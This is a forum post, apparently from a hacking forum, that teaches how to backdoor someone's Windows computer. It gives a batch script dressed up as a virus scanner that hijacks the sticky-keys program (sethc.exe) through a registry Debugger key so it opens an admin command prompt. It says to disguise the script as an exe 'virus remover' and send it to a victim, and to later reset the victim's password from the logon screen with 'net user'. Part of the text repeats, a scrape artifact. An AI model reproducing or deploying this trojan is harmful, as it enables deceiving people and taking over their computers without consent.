Creating a backdoor in batch 04-25-2014, 04:16 PM
#1
Hey guys, here's an easy way to create a backdoor in someone's computer. tools needed:
bat to exe converter.
notepad or any text editor
winrar
first type this code in notepad:
save it with a .bat extension then run it in bat to exe converter to change it to an exe file.(change its icon as well) then compress it with winrar and send it to someone as a virus remover.
Next time you access that persons computer, on the logon screen, hit shift 3 times and command prompt with admin privileges will open. then type:
and change the password to access the pc.
hope it was useful!
bat to exe converter.
notepad or any text editor
winrar
first type this code in notepad:
Code:
@echo off
title Scanning For Viruses
color 02
:scan
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
pause >nul
goto msg
:msg
echo.
echo Scan completed successfully.
pause >nul
echo.
echo Thank You for using backDoor Security.
pause >nul
exitsave it with a .bat extension then run it in bat to exe converter to change it to an exe file.(change its icon as well) then compress it with winrar and send it to someone as a virus remover.
Next time you access that persons computer, on the logon screen, hit shift 3 times and command prompt with admin privileges will open. then type:
Code:
Net user victimsAcoountName *hope it was useful!
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)

